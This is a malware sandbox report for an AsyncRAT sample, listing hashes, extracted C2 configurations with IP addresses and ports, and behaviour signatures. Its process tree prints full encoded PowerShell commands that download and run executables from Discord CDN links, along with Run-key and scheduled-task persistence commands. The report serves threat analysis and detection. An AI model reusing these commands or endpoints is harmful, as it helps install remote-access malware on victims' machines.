asyncrat | e5eb334cd06b77b445fd80a1d4e73f0137955ace8a2eebc3e59ed8b27a08cc1f

Analysis

max time kernel
163s
max time network
176s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
05-12-2022 06:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e5eb334cd06b77b445fd80a1d4e73f0137955ace8a2eebc3e59ed8b27a08cc1f.exe
Size

537KB
MD5

17b4433e4688d03b6908bb235b17371f
SHA1

5571a95725c7b175013c269fcf167ff55008c8e3
SHA256

e5eb334cd06b77b445fd80a1d4e73f0137955ace8a2eebc3e59ed8b27a08cc1f
SHA512

6ec8f639fd78c41be9dcb1730ae74547147f4cf94bab30e5420ab0aa6796c57232e56d460589a13f591f5ed35591b615081bdfb7eddd267d509d5ce1d705d30e
SSDEEP

12288:h4lThwQGIQilGzWTifG1g6eUmRP0xAt3hIPGk8T:ilTOFq7TifGG6+J0xAt3qel

Score

10^/10

asyncrat defendersmartscren system guard runtime persistence rat upx

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

System Guard Runtime

85.105.88.221:2531

Mutex

System Guard Runtime

Attributes

delay
3
install
false
install_file
System Guard Runtime
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

DefenderSmartScren

217.64.31.3:8437

Mutex

DefenderSmartScren

Attributes

delay
3
install
false
install_file
SecurityHealtheurvice.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 2 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/4308-241-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral2/memory/548-285-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

Blocklisted process makes network request 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow pid process

10 4716 powershell.exe
58 3988 powershell.exe
82 3672 powershell.exe
117 3836 powershell.exe
120 5076 powershell.exe
Downloads MZ/PE file

flow	pid	process
10	4716	powershell.exe
58	3988	powershell.exe
82	3672	powershell.exe
117	3836	powershell.exe
120	5076	powershell.exe

Executes dropped EXE 16 IoCs

Processes:

H5z75atzCJ.exedsffe4vb5.exe2hjVtjiBNv.exeqOOEzVORK4.exer8As6zVEkM.exeo91ZrCRLvL.exe3GWeRRnymH.exeZKzDHWBqis.exen5OyRoezGh.exe3lECubOkLU.exeIBW3OJPR8Y.exeqweqweqweqw.exeasdsadsadsa.exetryrtytryrty.exedsffe4vb5.exeqweqwewqe.exe

pid	process
2196	H5z75atzCJ.exe
1472	dsffe4vb5.exe
1460	2hjVtjiBNv.exe
380	qOOEzVORK4.exe
3720	r8As6zVEkM.exe
3476	o91ZrCRLvL.exe
2144	3GWeRRnymH.exe
920	ZKzDHWBqis.exe
4456	n5OyRoezGh.exe
4136	3lECubOkLU.exe
700	IBW3OJPR8Y.exe
1988	qweqweqweqw.exe
4320	asdsadsadsa.exe
1864	tryrtytryrty.exe
1480	dsffe4vb5.exe
3380	qweqwewqe.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/4512-132-0x00007FF64F200000-0x00007FF64F363000-memory.dmp	upx
behavioral2/memory/4512-142-0x00007FF64F200000-0x00007FF64F363000-memory.dmp	upx
behavioral2/memory/4512-205-0x00007FF64F200000-0x00007FF64F363000-memory.dmp	upx

Checks computer location settings 2 TTPs 10 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

H5z75atzCJ.exeqOOEzVORK4.exeo91ZrCRLvL.exeZKzDHWBqis.exe3lECubOkLU.exeIBW3OJPR8Y.exe2hjVtjiBNv.exer8As6zVEkM.exe3GWeRRnymH.exen5OyRoezGh.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	H5z75atzCJ.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	qOOEzVORK4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	o91ZrCRLvL.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	ZKzDHWBqis.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	3lECubOkLU.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	IBW3OJPR8Y.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	2hjVtjiBNv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	r8As6zVEkM.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	3GWeRRnymH.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	n5OyRoezGh.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exepowershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemGuardRuntime = "C:\\Users\\Admin\\AppData\\Roaming\\SystemGuardRuntime\\SystemGuardRuntime.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealthService = "C:\\Users\\Admin\\AppData\\Roaming\\SecurityHealthService\\SecurityHealthService.exe"	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

dsffe4vb5.exeqweqweqweqw.exetryrtytryrty.exeasdsadsadsa.exe

description	pid	process	target process
PID 1472 set thread context of 4308	1472	dsffe4vb5.exe	RegAsm.exe
PID 1988 set thread context of 2712	1988	qweqweqweqw.exe	RegAsm.exe
PID 1864 set thread context of 548	1864	tryrtytryrty.exe	RegAsm.exe
PID 4320 set thread context of 632	4320	asdsadsadsa.exe	RegAsm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3156 3380 WerFault.exe qweqwewqe.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

3792 schtasks.exe
4028 schtasks.exe

pid	pid_target	process	target process
3156	3380	WerFault.exe	qweqwewqe.exe

pid	process
3792	schtasks.exe
4028	schtasks.exe

Suspicious behavior: EnumeratesProcesses 31 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4716	powershell.exe
4716	powershell.exe
3988	powershell.exe
3672	powershell.exe
3672	powershell.exe
3836	powershell.exe
5076	powershell.exe
3988	powershell.exe
3572	powershell.exe
3572	powershell.exe
3836	powershell.exe
3836	powershell.exe
5076	powershell.exe
5076	powershell.exe
4500	powershell.exe
4500	powershell.exe
3572	powershell.exe
4716	powershell.exe
4716	powershell.exe
1684	powershell.exe
1684	powershell.exe
4716	powershell.exe
1684	powershell.exe
4500	powershell.exe
4864	powershell.exe
4864	powershell.exe
4864	powershell.exe
3388	powershell.exe
3388	powershell.exe
2336	powershell.exe
2336	powershell.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedsffe4vb5.exepowershell.exepowershell.exeasdsadsadsa.exe

description	pid	process
Token: SeDebugPrivilege	4716	powershell.exe
Token: SeDebugPrivilege	3988	powershell.exe
Token: SeDebugPrivilege	3672	powershell.exe
Token: SeDebugPrivilege	3836	powershell.exe
Token: SeDebugPrivilege	5076	powershell.exe
Token: SeDebugPrivilege	3572	powershell.exe
Token: SeDebugPrivilege	4500	powershell.exe
Token: SeDebugPrivilege	4716	powershell.exe
Token: SeDebugPrivilege	1684	powershell.exe
Token: SeDebugPrivilege	4864	powershell.exe
Token: SeDebugPrivilege	1472	dsffe4vb5.exe
Token: SeDebugPrivilege	3388	powershell.exe
Token: SeDebugPrivilege	2336	powershell.exe
Token: SeDebugPrivilege	4320	asdsadsadsa.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

e5eb334cd06b77b445fd80a1d4e73f0137955ace8a2eebc3e59ed8b27a08cc1f.execmd.exeH5z75atzCJ.exepowershell.execmd.execmd.execmd.exeqOOEzVORK4.exe2hjVtjiBNv.execmd.exer8As6zVEkM.exeo91ZrCRLvL.execmd.execmd.exe3GWeRRnymH.exeZKzDHWBqis.execmd.execmd.exen5OyRoezGh.exe3lECubOkLU.execmd.exeIBW3OJPR8Y.exedsffe4vb5.exe

description	pid	process	target process
PID 4512 wrote to memory of 2868	4512	e5eb334cd06b77b445fd80a1d4e73f0137955ace8a2eebc3e59ed8b27a08cc1f.exe	cmd.exe
PID 4512 wrote to memory of 2868	4512	e5eb334cd06b77b445fd80a1d4e73f0137955ace8a2eebc3e59ed8b27a08cc1f.exe	cmd.exe
PID 2868 wrote to memory of 2196	2868	cmd.exe	H5z75atzCJ.exe
PID 2868 wrote to memory of 2196	2868	cmd.exe	H5z75atzCJ.exe
PID 2196 wrote to memory of 4716	2196	H5z75atzCJ.exe	powershell.exe
PID 2196 wrote to memory of 4716	2196	H5z75atzCJ.exe	powershell.exe
PID 4716 wrote to memory of 1472	4716	powershell.exe	dsffe4vb5.exe
PID 4716 wrote to memory of 1472	4716	powershell.exe	dsffe4vb5.exe
PID 4716 wrote to memory of 1472	4716	powershell.exe	dsffe4vb5.exe
PID 4512 wrote to memory of 2640	4512	e5eb334cd06b77b445fd80a1d4e73f0137955ace8a2eebc3e59ed8b27a08cc1f.exe	cmd.exe
PID 4512 wrote to memory of 2640	4512	e5eb334cd06b77b445fd80a1d4e73f0137955ace8a2eebc3e59ed8b27a08cc1f.exe	cmd.exe
PID 4512 wrote to memory of 2276	4512	e5eb334cd06b77b445fd80a1d4e73f0137955ace8a2eebc3e59ed8b27a08cc1f.exe	cmd.exe
PID 4512 wrote to memory of 2276	4512	e5eb334cd06b77b445fd80a1d4e73f0137955ace8a2eebc3e59ed8b27a08cc1f.exe	cmd.exe
PID 2640 wrote to memory of 1460	2640	cmd.exe	2hjVtjiBNv.exe
PID 2640 wrote to memory of 1460	2640	cmd.exe	2hjVtjiBNv.exe
PID 2276 wrote to memory of 380	2276	cmd.exe	qOOEzVORK4.exe
PID 2276 wrote to memory of 380	2276	cmd.exe	qOOEzVORK4.exe
PID 4512 wrote to memory of 2224	4512	e5eb334cd06b77b445fd80a1d4e73f0137955ace8a2eebc3e59ed8b27a08cc1f.exe	cmd.exe
PID 4512 wrote to memory of 2224	4512	e5eb334cd06b77b445fd80a1d4e73f0137955ace8a2eebc3e59ed8b27a08cc1f.exe	cmd.exe
PID 2224 wrote to memory of 3720	2224	cmd.exe	r8As6zVEkM.exe
PID 2224 wrote to memory of 3720	2224	cmd.exe	r8As6zVEkM.exe
PID 380 wrote to memory of 3672	380	qOOEzVORK4.exe	powershell.exe
PID 380 wrote to memory of 3672	380	qOOEzVORK4.exe	powershell.exe
PID 1460 wrote to memory of 3988	1460	2hjVtjiBNv.exe	powershell.exe
PID 1460 wrote to memory of 3988	1460	2hjVtjiBNv.exe	powershell.exe
PID 4512 wrote to memory of 1880	4512	e5eb334cd06b77b445fd80a1d4e73f0137955ace8a2eebc3e59ed8b27a08cc1f.exe	cmd.exe
PID 4512 wrote to memory of 1880	4512	e5eb334cd06b77b445fd80a1d4e73f0137955ace8a2eebc3e59ed8b27a08cc1f.exe	cmd.exe
PID 4512 wrote to memory of 1256	4512	e5eb334cd06b77b445fd80a1d4e73f0137955ace8a2eebc3e59ed8b27a08cc1f.exe	cmd.exe
PID 4512 wrote to memory of 1256	4512	e5eb334cd06b77b445fd80a1d4e73f0137955ace8a2eebc3e59ed8b27a08cc1f.exe	cmd.exe
PID 1880 wrote to memory of 3476	1880	cmd.exe	o91ZrCRLvL.exe
PID 1880 wrote to memory of 3476	1880	cmd.exe	o91ZrCRLvL.exe
PID 3720 wrote to memory of 3836	3720	r8As6zVEkM.exe	powershell.exe
PID 3720 wrote to memory of 3836	3720	r8As6zVEkM.exe	powershell.exe
PID 4512 wrote to memory of 4688	4512	e5eb334cd06b77b445fd80a1d4e73f0137955ace8a2eebc3e59ed8b27a08cc1f.exe	cmd.exe
PID 4512 wrote to memory of 4688	4512	e5eb334cd06b77b445fd80a1d4e73f0137955ace8a2eebc3e59ed8b27a08cc1f.exe	cmd.exe
PID 3476 wrote to memory of 5076	3476	o91ZrCRLvL.exe	powershell.exe
PID 3476 wrote to memory of 5076	3476	o91ZrCRLvL.exe	powershell.exe
PID 1256 wrote to memory of 2144	1256	cmd.exe	3GWeRRnymH.exe
PID 1256 wrote to memory of 2144	1256	cmd.exe	3GWeRRnymH.exe
PID 4512 wrote to memory of 1760	4512	e5eb334cd06b77b445fd80a1d4e73f0137955ace8a2eebc3e59ed8b27a08cc1f.exe	cmd.exe
PID 4512 wrote to memory of 1760	4512	e5eb334cd06b77b445fd80a1d4e73f0137955ace8a2eebc3e59ed8b27a08cc1f.exe	cmd.exe
PID 4688 wrote to memory of 920	4688	cmd.exe	ZKzDHWBqis.exe
PID 4688 wrote to memory of 920	4688	cmd.exe	ZKzDHWBqis.exe
PID 2144 wrote to memory of 3572	2144	3GWeRRnymH.exe	powershell.exe
PID 2144 wrote to memory of 3572	2144	3GWeRRnymH.exe	powershell.exe
PID 4512 wrote to memory of 1804	4512	e5eb334cd06b77b445fd80a1d4e73f0137955ace8a2eebc3e59ed8b27a08cc1f.exe	cmd.exe
PID 4512 wrote to memory of 1804	4512	e5eb334cd06b77b445fd80a1d4e73f0137955ace8a2eebc3e59ed8b27a08cc1f.exe	cmd.exe
PID 4512 wrote to memory of 1560	4512	e5eb334cd06b77b445fd80a1d4e73f0137955ace8a2eebc3e59ed8b27a08cc1f.exe	cmd.exe
PID 4512 wrote to memory of 1560	4512	e5eb334cd06b77b445fd80a1d4e73f0137955ace8a2eebc3e59ed8b27a08cc1f.exe	cmd.exe
PID 920 wrote to memory of 4500	920	ZKzDHWBqis.exe	powershell.exe
PID 920 wrote to memory of 4500	920	ZKzDHWBqis.exe	powershell.exe
PID 1760 wrote to memory of 4456	1760	cmd.exe	n5OyRoezGh.exe
PID 1760 wrote to memory of 4456	1760	cmd.exe	n5OyRoezGh.exe
PID 1804 wrote to memory of 4136	1804	cmd.exe	3lECubOkLU.exe
PID 1804 wrote to memory of 4136	1804	cmd.exe	3lECubOkLU.exe
PID 4456 wrote to memory of 4716	4456	n5OyRoezGh.exe	powershell.exe
PID 4456 wrote to memory of 4716	4456	n5OyRoezGh.exe	powershell.exe
PID 4136 wrote to memory of 1684	4136	3lECubOkLU.exe	powershell.exe
PID 4136 wrote to memory of 1684	4136	3lECubOkLU.exe	powershell.exe
PID 1560 wrote to memory of 700	1560	cmd.exe	IBW3OJPR8Y.exe
PID 1560 wrote to memory of 700	1560	cmd.exe	IBW3OJPR8Y.exe
PID 700 wrote to memory of 4864	700	IBW3OJPR8Y.exe	powershell.exe
PID 700 wrote to memory of 4864	700	IBW3OJPR8Y.exe	powershell.exe
PID 1472 wrote to memory of 4308	1472	dsffe4vb5.exe	RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\e5eb334cd06b77b445fd80a1d4e73f0137955ace8a2eebc3e59ed8b27a08cc1f.exe
"C:\Users\Admin\AppData\Local\Temp\e5eb334cd06b77b445fd80a1d4e73f0137955ace8a2eebc3e59ed8b27a08cc1f.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4512

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\H5z75atzCJ.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:2868

C:\Users\Admin\AppData\Local\Temp\H5z75atzCJ.exe
C:\Users\Admin\AppData\Local\Temp\H5z75atzCJ.exe
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2196

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAeQB1ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADQAMgA0ADcANwA0ADEANwA2ADYAOAA4ADAAOAA3ADgANQAvADEAMAA0ADIANAA3ADcANQAwADYANAA4ADMAMQA5ADUAOQA2ADQALwBwAGwAbABtAG0AZABpAGkAcABtAC4AZQB4AGUAJwAsACAAPAAjAGwAdgBkACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdABqAHcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAawBlAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAZABzAGYAZgBlADQAdgBiADUALgBlAHgAZQAnACkAKQA8ACMAZQB6AHcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYgByAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGcAcQB1ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGQAcwBmAGYAZQA0AHYAYgA1AC4AZQB4AGUAJwApADwAIwByAHMAawAjAD4A"
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4716

C:\Users\Admin\AppData\Roaming\dsffe4vb5.exe
"C:\Users\Admin\AppData\Roaming\dsffe4vb5.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1472

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
6⤵
PID:4308

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\2hjVtjiBNv.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:2640

C:\Users\Admin\AppData\Local\Temp\2hjVtjiBNv.exe
C:\Users\Admin\AppData\Local\Temp\2hjVtjiBNv.exe
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1460

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAaQBoACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAAyADQANwA3ADQAMQA3ADYANgA4ADgAMAA4ADcAOAA1AC8AMQAwADQAMgA0ADcANwA1ADEAOQA4ADgAOAAxADkAOQA3ADMAMAAvAEMAUgAuAGUAeABlACcALAAgADwAIwB1AGkAbgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAcwBkACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGIAagBiACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHEAdwBlAHEAdwBlAHEAdwBlAHEAdwAuAGUAeABlACcAKQApADwAIwB3AGkAYwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AHMAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAYwByAGkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcQB3AGUAcQB3AGUAcQB3AGUAcQB3AC4AZQB4AGUAJwApADwAIwBnAHcAaQAjAD4A"
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3988

C:\Users\Admin\AppData\Roaming\qweqweqweqw.exe
"C:\Users\Admin\AppData\Roaming\qweqweqweqw.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1988

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime' -Value '"C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe"' -PropertyType 'String'
6⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3388

C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
6⤵
PID:1124

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
7⤵
- Creates scheduled task(s)
PID:3792

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
6⤵
PID:2712

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\qOOEzVORK4.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:2276

C:\Users\Admin\AppData\Local\Temp\qOOEzVORK4.exe
C:\Users\Admin\AppData\Local\Temp\qOOEzVORK4.exe
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:380

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAbgBpACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAAyADQANwA3ADQAMQA3ADYANgA4ADgAMAA4ADcAOAA1AC8AMQAwADQAMgA0ADcANwA1ADQANAAwADgAOQAzADIANQA2ADUAOQAvAGwAYwBvAG0AcABsAGMAbQBwAG8ALgBlAHgAZQAnACwAIAA8ACMAZgBwAHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAGIAawAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBnAHoAYQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBhAHMAZABzAGEAZABzAGEAZABzAGEALgBlAHgAZQAnACkAKQA8ACMAZwBsAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcwBmAHQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGcAagBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAcwBkAHMAYQBkAHMAYQBkAHMAYQAuAGUAeABlACcAKQA8ACMAcgBjAGsAIwA+AA=="
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3672

C:\Users\Admin\AppData\Roaming\asdsadsadsa.exe
"C:\Users\Admin\AppData\Roaming\asdsadsadsa.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4320

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
6⤵
PID:632

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\r8As6zVEkM.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:2224

C:\Users\Admin\AppData\Local\Temp\r8As6zVEkM.exe
C:\Users\Admin\AppData\Local\Temp\r8As6zVEkM.exe
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3720

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAbgBiACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA4ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAAyADQANwA3ADQAMQA3ADYANgA4ADgAMAA4ADcAOAA1AC8AMQAwADQAMgA0ADcANwA1ADUANAA4ADQANwA3ADEAOQA0ADQANAAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC4AZQB4AGUAJwAsACAAPAAjAGoAcABmACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgB0AHAAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBkAHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAdAByAHkAcgB0AHkAdAByAHkAcgB0AHkALgBlAHgAZQAnACkAKQA8ACMAZQBiAGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcwBmAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAG0AbQBtACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHQAcgB5AHIAdAB5AHQAcgB5AHIAdAB5AC4AZQB4AGUAJwApADwAIwBiAHcAdgAjAD4A"
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3836

C:\Users\Admin\AppData\Roaming\tryrtytryrty.exe
"C:\Users\Admin\AppData\Roaming\tryrtytryrty.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1864

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService' -Value '"C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe"' -PropertyType 'String'
6⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
